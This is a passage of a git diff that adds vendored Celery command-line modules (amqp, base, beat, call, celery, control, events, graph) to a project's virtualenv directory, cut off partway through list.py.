amqp_context.channel.queue_purge(queue=queue) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.cli_context.secho( + f'{retval} messages deleted.', + fg='cyan', bold=True) + amqp_context.echo_ok() + + +@amqp.command(name='basic.get') +@click.argument('queue', + type=str) +@click.argument('no_ack', + type=bool, + default=False) +@click.pass_obj +def basic_get(amqp_context, queue, no_ack): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + message = amqp_context.channel.basic_get(queue, no_ack=no_ack) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.respond(dump_message(message)) + amqp_context.echo_ok() + + +@amqp.command(name='basic.publish') +@click.argument('msg', + type=str) +@click.argument('exchange', + type=str) +@click.argument('routing_key', + type=str) +@click.argument('mandatory', + type=bool, + default=False) +@click.argument('immediate', + type=bool, + default=False) +@click.pass_obj +def basic_publish(amqp_context, msg, exchange, routing_key, mandatory, + immediate): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. 
Please retry...') + amqp_context.reconnect() + else: + # XXX Hack to fix Issue #2013 + if isinstance(amqp_context.connection.connection, Connection): + msg = Message(msg) + try: + amqp_context.channel.basic_publish(msg, + exchange=exchange, + routing_key=routing_key, + mandatory=mandatory, + immediate=immediate) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +@amqp.command(name='basic.ack') +@click.argument('delivery_tag', + type=int) +@click.pass_obj +def basic_ack(amqp_context, delivery_tag): + if amqp_context.channel is None: + amqp_context.echo_error('Not connected to broker. Please retry...') + amqp_context.reconnect() + else: + try: + amqp_context.channel.basic_ack(delivery_tag) + except Exception as e: + amqp_context.echo_error(e) + amqp_context.reconnect() + else: + amqp_context.echo_ok() + + +register_repl(amqp) diff --git a/env/Lib/site-packages/celery/bin/base.py b/env/Lib/site-packages/celery/bin/base.py new file mode 100644 index 00000000..63a28957 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/base.py @@ -0,0 +1,287 @@ +"""Click customizations for Celery.""" +import json +import numbers +from collections import OrderedDict +from functools import update_wrapper +from pprint import pformat + +import click +from click import ParamType +from kombu.utils.objects import cached_property + +from celery._state import get_current_app +from celery.signals import user_preload_options +from celery.utils import text +from celery.utils.log import mlevel +from celery.utils.time import maybe_iso8601 + +try: + from pygments import highlight + from pygments.formatters import Terminal256Formatter + from pygments.lexers import PythonLexer +except ImportError: + def highlight(s, *args, **kwargs): + """Place holder function in case pygments is missing.""" + return s + LEXER = None + FORMATTER = None +else: + LEXER = PythonLexer() + FORMATTER = Terminal256Formatter() + + +class CLIContext: + """Context Object for the CLI.""" + + def __init__(self, app, no_color, workdir, quiet=False): + """Initialize the CLI context.""" + self.app = app or get_current_app() + self.no_color = no_color + self.quiet = quiet + self.workdir = workdir + + @cached_property + def OK(self): + return self.style("OK", fg="green", bold=True) + + @cached_property + def ERROR(self): + return self.style("ERROR", fg="red", bold=True) + + def style(self, message=None, **kwargs): + if self.no_color: + return message + else: + return click.style(message, **kwargs) + + def secho(self, message=None, **kwargs): + if self.no_color: + kwargs['color'] = False + click.echo(message, **kwargs) + else: + click.secho(message, **kwargs) + + def echo(self, message=None, **kwargs): + if self.no_color: + kwargs['color'] = False + click.echo(message, **kwargs) + else: + click.echo(message, **kwargs) + + def error(self, message=None, **kwargs): + kwargs['err'] = True + if self.no_color: + kwargs['color'] = False + click.echo(message, **kwargs) + else: + click.secho(message, **kwargs) + + def pretty(self, n): + if isinstance(n, list): + return self.OK, self.pretty_list(n) + if isinstance(n, dict): + if 'ok' in n or 'error' in n: + return self.pretty_dict_ok_error(n) + else: + s = json.dumps(n, sort_keys=True, indent=4) + if not self.no_color: + s = highlight(s, LEXER, FORMATTER) + return self.OK, s + if isinstance(n, str): + return self.OK, n + return self.OK, pformat(n) + + def pretty_list(self, n): + if not n: + return '- empty -' + return '\n'.join( + f'{self.style("*", 
fg="white")} {item}' for item in n + ) + + def pretty_dict_ok_error(self, n): + try: + return (self.OK, + text.indent(self.pretty(n['ok'])[1], 4)) + except KeyError: + pass + return (self.ERROR, + text.indent(self.pretty(n['error'])[1], 4)) + + def say_chat(self, direction, title, body='', show_body=False): + if direction == '<-' and self.quiet: + return + dirstr = not self.quiet and f'{self.style(direction, fg="white", bold=True)} ' or '' + self.echo(f'{dirstr} {title}') + if body and show_body: + self.echo(body) + + +def handle_preload_options(f): + """Extract preload options and return a wrapped callable.""" + def caller(ctx, *args, **kwargs): + app = ctx.obj.app + + preload_options = [o.name for o in app.user_options.get('preload', [])] + + if preload_options: + user_options = { + preload_option: kwargs[preload_option] + for preload_option in preload_options + } + + user_preload_options.send(sender=f, app=app, options=user_options) + + return f(ctx, *args, **kwargs) + + return update_wrapper(caller, f) + + +class CeleryOption(click.Option): + """Customized option for Celery.""" + + def get_default(self, ctx, *args, **kwargs): + if self.default_value_from_context: + self.default = ctx.obj[self.default_value_from_context] + return super().get_default(ctx, *args, **kwargs) + + def __init__(self, *args, **kwargs): + """Initialize a Celery option.""" + self.help_group = kwargs.pop('help_group', None) + self.default_value_from_context = kwargs.pop('default_value_from_context', None) + super().__init__(*args, **kwargs) + + +class CeleryCommand(click.Command): + """Customized command for Celery.""" + + def format_options(self, ctx, formatter): + """Write all the options into the formatter if they exist.""" + opts = OrderedDict() + for param in self.get_params(ctx): + rv = param.get_help_record(ctx) + if rv is not None: + if hasattr(param, 'help_group') and param.help_group: + opts.setdefault(str(param.help_group), []).append(rv) + else: + opts.setdefault('Options', []).append(rv) + + for name, opts_group in opts.items(): + with formatter.section(name): + formatter.write_dl(opts_group) + + +class CeleryDaemonCommand(CeleryCommand): + """Daemon commands.""" + + def __init__(self, *args, **kwargs): + """Initialize a Celery command with common daemon options.""" + super().__init__(*args, **kwargs) + self.params.append(CeleryOption(('-f', '--logfile'), help_group="Daemonization Options", + help="Log destination; defaults to stderr")) + self.params.append(CeleryOption(('--pidfile',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--uid',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--gid',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--umask',), help_group="Daemonization Options")) + self.params.append(CeleryOption(('--executable',), help_group="Daemonization Options")) + + +class CommaSeparatedList(ParamType): + """Comma separated list argument.""" + + name = "comma separated list" + + def convert(self, value, param, ctx): + return text.str_to_list(value) + + +class JsonArray(ParamType): + """JSON formatted array argument.""" + + name = "json array" + + def convert(self, value, param, ctx): + if isinstance(value, list): + return value + + try: + v = json.loads(value) + except ValueError as e: + self.fail(str(e)) + + if not isinstance(v, list): + self.fail(f"{value} was not an array") + + return v + + +class JsonObject(ParamType): + """JSON formatted object argument.""" + + name = "json object" + + def 
convert(self, value, param, ctx): + if isinstance(value, dict): + return value + + try: + v = json.loads(value) + except ValueError as e: + self.fail(str(e)) + + if not isinstance(v, dict): + self.fail(f"{value} was not an object") + + return v + + +class ISO8601DateTime(ParamType): + """ISO 8601 Date Time argument.""" + + name = "iso-86091" + + def convert(self, value, param, ctx): + try: + return maybe_iso8601(value) + except (TypeError, ValueError) as e: + self.fail(e) + + +class ISO8601DateTimeOrFloat(ParamType): + """ISO 8601 Date Time or float argument.""" + + name = "iso-86091 or float" + + def convert(self, value, param, ctx): + try: + return float(value) + except (TypeError, ValueError): + pass + + try: + return maybe_iso8601(value) + except (TypeError, ValueError) as e: + self.fail(e) + + +class LogLevel(click.Choice): + """Log level option.""" + + def __init__(self): + """Initialize the log level option with the relevant choices.""" + super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL')) + + def convert(self, value, param, ctx): + if isinstance(value, numbers.Integral): + return value + + value = value.upper() + value = super().convert(value, param, ctx) + return mlevel(value) + + +JSON_ARRAY = JsonArray() +JSON_OBJECT = JsonObject() +ISO8601 = ISO8601DateTime() +ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat() +LOG_LEVEL = LogLevel() +COMMA_SEPARATED_LIST = CommaSeparatedList() diff --git a/env/Lib/site-packages/celery/bin/beat.py b/env/Lib/site-packages/celery/bin/beat.py new file mode 100644 index 00000000..c8a8a499 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/beat.py @@ -0,0 +1,72 @@ +"""The :program:`celery beat` command.""" +from functools import partial + +import click + +from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options +from celery.platforms import detached, maybe_drop_privileges + + +@click.command(cls=CeleryDaemonCommand, context_settings={ + 'allow_extra_args': True +}) +@click.option('--detach', + cls=CeleryOption, + is_flag=True, + default=False, + help_group="Beat Options", + help="Detach and run in the background as a daemon.") +@click.option('-s', + '--schedule', + cls=CeleryOption, + callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename, + help_group="Beat Options", + help="Path to the schedule database." + " Defaults to `celerybeat-schedule`." 
+ "The extension '.db' may be appended to the filename.") +@click.option('-S', + '--scheduler', + cls=CeleryOption, + callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_scheduler, + help_group="Beat Options", + help="Scheduler class to use.") +@click.option('--max-interval', + cls=CeleryOption, + type=int, + help_group="Beat Options", + help="Max seconds to sleep between schedule iterations.") +@click.option('-l', + '--loglevel', + default='WARNING', + cls=CeleryOption, + type=LOG_LEVEL, + help_group="Beat Options", + help="Logging level.") +@click.pass_context +@handle_preload_options +def beat(ctx, detach=False, logfile=None, pidfile=None, uid=None, + gid=None, umask=None, workdir=None, **kwargs): + """Start the beat periodic task scheduler.""" + app = ctx.obj.app + + if ctx.args: + try: + app.config_from_cmdline(ctx.args) + except (KeyError, ValueError) as e: + # TODO: Improve the error messages + raise click.UsageError("Unable to parse extra configuration" + " from command line.\n" + f"Reason: {e}", ctx=ctx) + + if not detach: + maybe_drop_privileges(uid=uid, gid=gid) + + beat = partial(app.Beat, + logfile=logfile, pidfile=pidfile, + quiet=ctx.obj.quiet, **kwargs) + + if detach: + with detached(logfile, pidfile, uid, gid, umask, workdir): + return beat().run() + else: + return beat().run() diff --git a/env/Lib/site-packages/celery/bin/call.py b/env/Lib/site-packages/celery/bin/call.py new file mode 100644 index 00000000..b1df9502 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/call.py @@ -0,0 +1,71 @@ +"""The ``celery call`` program used to send tasks from the command-line.""" +import click + +from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY, JSON_OBJECT, CeleryCommand, CeleryOption, + handle_preload_options) + + +@click.command(cls=CeleryCommand) +@click.argument('name') +@click.option('-a', + '--args', + cls=CeleryOption, + type=JSON_ARRAY, + default='[]', + help_group="Calling Options", + help="Positional arguments.") +@click.option('-k', + '--kwargs', + cls=CeleryOption, + type=JSON_OBJECT, + default='{}', + help_group="Calling Options", + help="Keyword arguments.") +@click.option('--eta', + cls=CeleryOption, + type=ISO8601, + help_group="Calling Options", + help="scheduled time.") +@click.option('--countdown', + cls=CeleryOption, + type=float, + help_group="Calling Options", + help="eta in seconds from now.") +@click.option('--expires', + cls=CeleryOption, + type=ISO8601_OR_FLOAT, + help_group="Calling Options", + help="expiry time.") +@click.option('--serializer', + cls=CeleryOption, + default='json', + help_group="Calling Options", + help="task serializer.") +@click.option('--queue', + cls=CeleryOption, + help_group="Routing Options", + help="custom queue name.") +@click.option('--exchange', + cls=CeleryOption, + help_group="Routing Options", + help="custom exchange name.") +@click.option('--routing-key', + cls=CeleryOption, + help_group="Routing Options", + help="custom routing key.") +@click.pass_context +@handle_preload_options +def call(ctx, name, args, kwargs, eta, countdown, expires, serializer, queue, exchange, routing_key): + """Call a task by name.""" + task_id = ctx.obj.app.send_task( + name, + args=args, kwargs=kwargs, + countdown=countdown, + serializer=serializer, + queue=queue, + exchange=exchange, + routing_key=routing_key, + eta=eta, + expires=expires + ).id + ctx.obj.echo(task_id) diff --git a/env/Lib/site-packages/celery/bin/celery.py b/env/Lib/site-packages/celery/bin/celery.py new file mode 100644 index 00000000..4aeed425 --- 
/dev/null +++ b/env/Lib/site-packages/celery/bin/celery.py @@ -0,0 +1,236 @@ +"""Celery Command Line Interface.""" +import os +import pathlib +import sys +import traceback + +try: + from importlib.metadata import entry_points +except ImportError: + from importlib_metadata import entry_points + +import click +import click.exceptions +from click.types import ParamType +from click_didyoumean import DYMGroup +from click_plugins import with_plugins + +from celery import VERSION_BANNER +from celery.app.utils import find_app +from celery.bin.amqp import amqp +from celery.bin.base import CeleryCommand, CeleryOption, CLIContext +from celery.bin.beat import beat +from celery.bin.call import call +from celery.bin.control import control, inspect, status +from celery.bin.events import events +from celery.bin.graph import graph +from celery.bin.list import list_ +from celery.bin.logtool import logtool +from celery.bin.migrate import migrate +from celery.bin.multi import multi +from celery.bin.purge import purge +from celery.bin.result import result +from celery.bin.shell import shell +from celery.bin.upgrade import upgrade +from celery.bin.worker import worker + +UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND = click.style(""" +Unable to load celery application. +The module {0} was not found.""", fg='red') + +UNABLE_TO_LOAD_APP_ERROR_OCCURRED = click.style(""" +Unable to load celery application. +While trying to load the module {0} the following error occurred: +{1}""", fg='red') + +UNABLE_TO_LOAD_APP_APP_MISSING = click.style(""" +Unable to load celery application. +{0}""") + + +class App(ParamType): + """Application option.""" + + name = "application" + + def convert(self, value, param, ctx): + try: + return find_app(value) + except ModuleNotFoundError as e: + if e.name != value: + exc = traceback.format_exc() + self.fail( + UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) + ) + self.fail(UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND.format(e.name)) + except AttributeError as e: + attribute_name = e.args[0].capitalize() + self.fail(UNABLE_TO_LOAD_APP_APP_MISSING.format(attribute_name)) + except Exception: + exc = traceback.format_exc() + self.fail( + UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) + ) + + +APP = App() + + +if sys.version_info >= (3, 10): + _PLUGINS = entry_points(group='celery.commands') +else: + try: + _PLUGINS = entry_points().get('celery.commands', []) + except AttributeError: + _PLUGINS = entry_points().select(group='celery.commands') + + +@with_plugins(_PLUGINS) +@click.group(cls=DYMGroup, invoke_without_command=True) +@click.option('-A', + '--app', + envvar='APP', + cls=CeleryOption, + type=APP, + help_group="Global Options") +@click.option('-b', + '--broker', + envvar='BROKER_URL', + cls=CeleryOption, + help_group="Global Options") +@click.option('--result-backend', + envvar='RESULT_BACKEND', + cls=CeleryOption, + help_group="Global Options") +@click.option('--loader', + envvar='LOADER', + cls=CeleryOption, + help_group="Global Options") +@click.option('--config', + envvar='CONFIG_MODULE', + cls=CeleryOption, + help_group="Global Options") +@click.option('--workdir', + cls=CeleryOption, + type=pathlib.Path, + callback=lambda _, __, wd: os.chdir(wd) if wd else None, + is_eager=True, + help_group="Global Options") +@click.option('-C', + '--no-color', + envvar='NO_COLOR', + is_flag=True, + cls=CeleryOption, + help_group="Global Options") +@click.option('-q', + '--quiet', + is_flag=True, + cls=CeleryOption, + help_group="Global Options") +@click.option('--version', + cls=CeleryOption, + 
is_flag=True, + help_group="Global Options") +@click.option('--skip-checks', + envvar='SKIP_CHECKS', + cls=CeleryOption, + is_flag=True, + help_group="Global Options", + help="Skip Django core checks on startup. Setting the SKIP_CHECKS environment " + "variable to any non-empty string will have the same effect.") +@click.pass_context +def celery(ctx, app, broker, result_backend, loader, config, workdir, + no_color, quiet, version, skip_checks): + """Celery command entrypoint.""" + if version: + click.echo(VERSION_BANNER) + ctx.exit() + elif ctx.invoked_subcommand is None: + click.echo(ctx.get_help()) + ctx.exit() + + if loader: + # Default app takes loader from this env (Issue #1066). + os.environ['CELERY_LOADER'] = loader + if broker: + os.environ['CELERY_BROKER_URL'] = broker + if result_backend: + os.environ['CELERY_RESULT_BACKEND'] = result_backend + if config: + os.environ['CELERY_CONFIG_MODULE'] = config + if skip_checks: + os.environ['CELERY_SKIP_CHECKS'] = 'true' + ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir, + quiet=quiet) + + # User options + worker.params.extend(ctx.obj.app.user_options.get('worker', [])) + beat.params.extend(ctx.obj.app.user_options.get('beat', [])) + events.params.extend(ctx.obj.app.user_options.get('events', [])) + + for command in celery.commands.values(): + command.params.extend(ctx.obj.app.user_options.get('preload', [])) + + +@celery.command(cls=CeleryCommand) +@click.pass_context +def report(ctx, **kwargs): + """Shows information useful to include in bug-reports.""" + app = ctx.obj.app + app.loader.import_default_modules() + ctx.obj.echo(app.bugreport()) + + +celery.add_command(purge) +celery.add_command(call) +celery.add_command(beat) +celery.add_command(list_) +celery.add_command(result) +celery.add_command(migrate) +celery.add_command(status) +celery.add_command(worker) +celery.add_command(events) +celery.add_command(inspect) +celery.add_command(control) +celery.add_command(graph) +celery.add_command(upgrade) +celery.add_command(logtool) +celery.add_command(amqp) +celery.add_command(shell) +celery.add_command(multi) + +# Monkey-patch click to display a custom error +# when -A or --app are used as sub-command options instead of as options +# of the global command. + +previous_show_implementation = click.exceptions.NoSuchOption.show + +WRONG_APP_OPTION_USAGE_MESSAGE = """You are using `{option_name}` as an option of the {info_name} sub-command: +celery {info_name} {option_name} celeryapp <...> + +The support for this usage was removed in Celery 5.0. Instead you should use `{option_name}` as a global option: +celery {option_name} celeryapp {info_name} <...>""" + + +def _show(self, file=None): + if self.option_name in ('-A', '--app'): + self.ctx.obj.error( + WRONG_APP_OPTION_USAGE_MESSAGE.format( + option_name=self.option_name, + info_name=self.ctx.info_name), + fg='red' + ) + previous_show_implementation(self, file=file) + + +click.exceptions.NoSuchOption.show = _show + + +def main() -> int: + """Start celery umbrella command. + + This function is the main entrypoint for the CLI. + + :return: The exit code of the CLI. + """ + return celery(auto_envvar_prefix="CELERY") diff --git a/env/Lib/site-packages/celery/bin/control.py b/env/Lib/site-packages/celery/bin/control.py new file mode 100644 index 00000000..f7bba96d --- /dev/null +++ b/env/Lib/site-packages/celery/bin/control.py @@ -0,0 +1,203 @@ +"""The ``celery control``, ``. inspect`` and ``. 
status`` programs.""" +from functools import partial + +import click +from kombu.utils.json import dumps + +from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options +from celery.exceptions import CeleryCommandException +from celery.platforms import EX_UNAVAILABLE +from celery.utils import text +from celery.worker.control import Panel + + +def _say_remote_command_reply(ctx, replies, show_reply=False): + node = next(iter(replies)) # <-- take first. + reply = replies[node] + node = ctx.obj.style(f'{node}: ', fg='cyan', bold=True) + status, preply = ctx.obj.pretty(reply) + ctx.obj.say_chat('->', f'{node}{status}', + text.indent(preply, 4) if show_reply else '', + show_body=show_reply) + + +def _consume_arguments(meta, method, args): + i = 0 + try: + for i, arg in enumerate(args): + try: + name, typ = meta.args[i] + except IndexError: + if meta.variadic: + break + raise click.UsageError( + 'Command {!r} takes arguments: {}'.format( + method, meta.signature)) + else: + yield name, typ(arg) if typ is not None else arg + finally: + args[:] = args[i:] + + +def _compile_arguments(action, args): + meta = Panel.meta[action] + arguments = {} + if meta.args: + arguments.update({ + k: v for k, v in _consume_arguments(meta, action, args) + }) + if meta.variadic: + arguments.update({meta.variadic: args}) + return arguments + + +@click.command(cls=CeleryCommand) +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + default=1.0, + help_group='Remote Control Options', + help='Timeout in seconds waiting for reply.') +@click.option('-d', + '--destination', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Remote Control Options', + help='Comma separated list of destination node names.') +@click.option('-j', + '--json', + cls=CeleryOption, + is_flag=True, + help_group='Remote Control Options', + help='Use json as output format.') +@click.pass_context +@handle_preload_options +def status(ctx, timeout, destination, json, **kwargs): + """Show list of workers that are online.""" + callback = None if json else partial(_say_remote_command_reply, ctx) + replies = ctx.obj.app.control.inspect(timeout=timeout, + destination=destination, + callback=callback).ping() + + if not replies: + raise CeleryCommandException( + message='No nodes replied within time constraint', + exit_code=EX_UNAVAILABLE + ) + + if json: + ctx.obj.echo(dumps(replies)) + nodecount = len(replies) + if not kwargs.get('quiet', False): + ctx.obj.echo('\n{} {} online.'.format( + nodecount, text.pluralize(nodecount, 'node'))) + + +@click.command(cls=CeleryCommand, + context_settings={'allow_extra_args': True}) +@click.argument("action", type=click.Choice([ + name for name, info in Panel.meta.items() + if info.type == 'inspect' and info.visible +])) +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + default=1.0, + help_group='Remote Control Options', + help='Timeout in seconds waiting for reply.') +@click.option('-d', + '--destination', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Remote Control Options', + help='Comma separated list of destination node names.') +@click.option('-j', + '--json', + cls=CeleryOption, + is_flag=True, + help_group='Remote Control Options', + help='Use json as output format.') +@click.pass_context +@handle_preload_options +def inspect(ctx, action, timeout, destination, json, **kwargs): + """Inspect the worker at runtime. + + Availability: RabbitMQ (AMQP) and Redis transports. 
+ """ + callback = None if json else partial(_say_remote_command_reply, ctx, + show_reply=True) + arguments = _compile_arguments(action, ctx.args) + inspect = ctx.obj.app.control.inspect(timeout=timeout, + destination=destination, + callback=callback) + replies = inspect._request(action, + **arguments) + + if not replies: + raise CeleryCommandException( + message='No nodes replied within time constraint', + exit_code=EX_UNAVAILABLE + ) + + if json: + ctx.obj.echo(dumps(replies)) + return + + nodecount = len(replies) + if not ctx.obj.quiet: + ctx.obj.echo('\n{} {} online.'.format( + nodecount, text.pluralize(nodecount, 'node'))) + + +@click.command(cls=CeleryCommand, + context_settings={'allow_extra_args': True}) +@click.argument("action", type=click.Choice([ + name for name, info in Panel.meta.items() + if info.type == 'control' and info.visible +])) +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + default=1.0, + help_group='Remote Control Options', + help='Timeout in seconds waiting for reply.') +@click.option('-d', + '--destination', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Remote Control Options', + help='Comma separated list of destination node names.') +@click.option('-j', + '--json', + cls=CeleryOption, + is_flag=True, + help_group='Remote Control Options', + help='Use json as output format.') +@click.pass_context +@handle_preload_options +def control(ctx, action, timeout, destination, json): + """Workers remote control. + + Availability: RabbitMQ (AMQP), Redis, and MongoDB transports. + """ + callback = None if json else partial(_say_remote_command_reply, ctx, + show_reply=True) + args = ctx.args + arguments = _compile_arguments(action, args) + replies = ctx.obj.app.control.broadcast(action, timeout=timeout, + destination=destination, + callback=callback, + reply=True, + arguments=arguments) + + if not replies: + raise CeleryCommandException( + message='No nodes replied within time constraint', + exit_code=EX_UNAVAILABLE + ) + + if json: + ctx.obj.echo(dumps(replies)) diff --git a/env/Lib/site-packages/celery/bin/events.py b/env/Lib/site-packages/celery/bin/events.py new file mode 100644 index 00000000..89470838 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/events.py @@ -0,0 +1,94 @@ +"""The ``celery events`` program.""" +import sys +from functools import partial + +import click + +from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options +from celery.platforms import detached, set_process_title, strargv + + +def _set_process_status(prog, info=''): + prog = '{}:{}'.format('celery events', prog) + info = f'{info} {strargv(sys.argv)}' + return set_process_title(prog, info=info) + + +def _run_evdump(app): + from celery.events.dumper import evdump + _set_process_status('dump') + return evdump(app=app) + + +def _run_evcam(camera, app, logfile=None, pidfile=None, uid=None, + gid=None, umask=None, workdir=None, + detach=False, **kwargs): + from celery.events.snapshot import evcam + _set_process_status('cam') + kwargs['app'] = app + cam = partial(evcam, camera, + logfile=logfile, pidfile=pidfile, **kwargs) + + if detach: + with detached(logfile, pidfile, uid, gid, umask, workdir): + return cam() + else: + return cam() + + +def _run_evtop(app): + try: + from celery.events.cursesmon import evtop + _set_process_status('top') + return evtop(app=app) + except ModuleNotFoundError as e: + if e.name == '_curses': + # TODO: Improve this error message + raise click.UsageError("The curses module is required for 
this command.") + + +@click.command(cls=CeleryDaemonCommand) +@click.option('-d', + '--dump', + cls=CeleryOption, + is_flag=True, + help_group='Dumper') +@click.option('-c', + '--camera', + cls=CeleryOption, + help_group='Snapshot') +@click.option('-d', + '--detach', + cls=CeleryOption, + is_flag=True, + help_group='Snapshot') +@click.option('-F', '--frequency', '--freq', + type=float, + default=1.0, + cls=CeleryOption, + help_group='Snapshot') +@click.option('-r', '--maxrate', + cls=CeleryOption, + help_group='Snapshot') +@click.option('-l', + '--loglevel', + default='WARNING', + cls=CeleryOption, + type=LOG_LEVEL, + help_group="Snapshot", + help="Logging level.") +@click.pass_context +@handle_preload_options +def events(ctx, dump, camera, detach, frequency, maxrate, loglevel, **kwargs): + """Event-stream utilities.""" + app = ctx.obj.app + if dump: + return _run_evdump(app) + + if camera: + return _run_evcam(camera, app=app, freq=frequency, maxrate=maxrate, + loglevel=loglevel, + detach=detach, + **kwargs) + + return _run_evtop(app) diff --git a/env/Lib/site-packages/celery/bin/graph.py b/env/Lib/site-packages/celery/bin/graph.py new file mode 100644 index 00000000..d4d6f162 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/graph.py @@ -0,0 +1,197 @@ +"""The ``celery graph`` command.""" +import sys +from operator import itemgetter + +import click + +from celery.bin.base import CeleryCommand, handle_preload_options +from celery.utils.graph import DependencyGraph, GraphFormatter + + +@click.group() +@click.pass_context +@handle_preload_options +def graph(ctx): + """The ``celery graph`` command.""" + + +@graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) +@click.pass_context +def bootsteps(ctx): + """Display bootsteps graph.""" + worker = ctx.obj.app.WorkController() + include = {arg.lower() for arg in ctx.args or ['worker', 'consumer']} + if 'worker' in include: + worker_graph = worker.blueprint.graph + if 'consumer' in include: + worker.blueprint.connect_with(worker.consumer.blueprint) + else: + worker_graph = worker.consumer.blueprint.graph + worker_graph.to_dot(sys.stdout) + + +@graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) +@click.pass_context +def workers(ctx): + """Display workers graph.""" + def simplearg(arg): + return maybe_list(itemgetter(0, 2)(arg.partition(':'))) + + def maybe_list(l, sep=','): + return l[0], l[1].split(sep) if sep in l[1] else l[1] + + args = dict(simplearg(arg) for arg in ctx.args) + generic = 'generic' in args + + def generic_label(node): + return '{} ({}://)'.format(type(node).__name__, + node._label.split('://')[0]) + + class Node: + force_label = None + scheme = {} + + def __init__(self, label, pos=None): + self._label = label + self.pos = pos + + def label(self): + return self._label + + def __str__(self): + return self.label() + + class Thread(Node): + scheme = { + 'fillcolor': 'lightcyan4', + 'fontcolor': 'yellow', + 'shape': 'oval', + 'fontsize': 10, + 'width': 0.3, + 'color': 'black', + } + + def __init__(self, label, **kwargs): + self.real_label = label + super().__init__( + label=f'thr-{next(tids)}', + pos=0, + ) + + class Formatter(GraphFormatter): + + def label(self, obj): + return obj and obj.label() + + def node(self, obj): + scheme = dict(obj.scheme) if obj.pos else obj.scheme + if isinstance(obj, Thread): + scheme['label'] = obj.real_label + return self.draw_node( + obj, dict(self.node_scheme, **scheme), + ) + + def terminal_node(self, obj): + return self.draw_node( + obj, 
dict(self.term_scheme, **obj.scheme), + ) + + def edge(self, a, b, **attrs): + if isinstance(a, Thread): + attrs.update(arrowhead='none', arrowtail='tee') + return self.draw_edge(a, b, self.edge_scheme, attrs) + + def subscript(n): + S = {'0': '₀', '1': '₁', '2': '₂', '3': '₃', '4': '₄', + '5': '₅', '6': '₆', '7': '₇', '8': '₈', '9': '₉'} + return ''.join([S[i] for i in str(n)]) + + class Worker(Node): + pass + + class Backend(Node): + scheme = { + 'shape': 'folder', + 'width': 2, + 'height': 1, + 'color': 'black', + 'fillcolor': 'peachpuff3', + } + + def label(self): + return generic_label(self) if generic else self._label + + class Broker(Node): + scheme = { + 'shape': 'circle', + 'fillcolor': 'cadetblue3', + 'color': 'cadetblue4', + 'height': 1, + } + + def label(self): + return generic_label(self) if generic else self._label + + from itertools import count + tids = count(1) + Wmax = int(args.get('wmax', 4) or 0) + Tmax = int(args.get('tmax', 3) or 0) + + def maybe_abbr(l, name, max=Wmax): + size = len(l) + abbr = max and size > max + if 'enumerate' in args: + l = [f'{name}{subscript(i + 1)}' + for i, obj in enumerate(l)] + if abbr: + l = l[0:max - 1] + [l[size - 1]] + l[max - 2] = '{}⎨…{}⎬'.format( + name[0], subscript(size - (max - 1))) + return l + + app = ctx.obj.app + try: + workers = args['nodes'] + threads = args.get('threads') or [] + except KeyError: + replies = app.control.inspect().stats() or {} + workers, threads = [], [] + for worker, reply in replies.items(): + workers.append(worker) + threads.append(reply['pool']['max-concurrency']) + + wlen = len(workers) + backend = args.get('backend', app.conf.result_backend) + threads_for = {} + workers = maybe_abbr(workers, 'Worker') + if Wmax and wlen > Wmax: + threads = threads[0:3] + [threads[-1]] + for i, threads in enumerate(threads): + threads_for[workers[i]] = maybe_abbr( + list(range(int(threads))), 'P', Tmax, + ) + + broker = Broker(args.get( + 'broker', app.connection_for_read().as_uri())) + backend = Backend(backend) if backend else None + deps = DependencyGraph(formatter=Formatter()) + deps.add_arc(broker) + if backend: + deps.add_arc(backend) + curworker = [0] + for i, worker in enumerate(workers): + worker = Worker(worker, pos=i) + deps.add_arc(worker) + deps.add_edge(worker, broker) + if backend: + deps.add_edge(worker, backend) + threads = threads_for.get(worker._label) + if threads: + for thread in threads: + thread = Thread(thread) + deps.add_arc(thread) + deps.add_edge(thread, worker) + + curworker[0] += 1 + + deps.to_dot(sys.stdout) diff --git a/env/Lib/site-packages/celery/bin/list.py b/env/Lib/site-packages/celery/bin/list.py new file mode 100644 index 00000000..f170e627 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/list.py @@ -0,0 +1,38 @@ +"""The ``celery list bindings`` command, used to inspect queue bindings.""" +import click + +from celery.bin.base import CeleryCommand, handle_preload_options + + +@click.group(name="list") +@click.pass_context +@handle_preload_options +def list_(ctx): + """Get info from broker. + + Note: + + For 